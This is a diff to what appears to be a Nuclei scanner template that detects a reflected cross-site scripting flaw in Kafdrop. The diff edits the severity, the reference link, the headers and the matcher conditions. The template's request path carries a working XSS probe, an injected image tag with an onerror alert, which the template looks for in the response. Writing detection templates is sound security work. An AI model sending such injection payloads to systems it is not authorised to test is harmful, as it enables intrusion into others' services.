--- a/vulnerabilities/other/kafdrop-xss.yaml
+++ b/vulnerabilities/other/kafdrop-xss.yaml
@@ -3,16 +3,15 @@ id: kafdrop-xss
 info:
   name: KafDrop XSS
   author: dhiyaneshDk
-  severity: high
+  severity: medium
   tags: kafdrop,xss
-  reference: https://github.com/obsidiandynamics/kafdrop
+  reference: https://github.com/HomeAdvisor/Kafdrop/issues/12
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E"
-    headers:
-      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
+
     matchers-condition: and
     matchers:
       - type: word
@@ -20,6 +19,7 @@ requests:
           - 'Kafdrop'
           - '<img src=x onerror=alert(2)>'
         part: body
+        condition: and
 
       - type: status
         status:
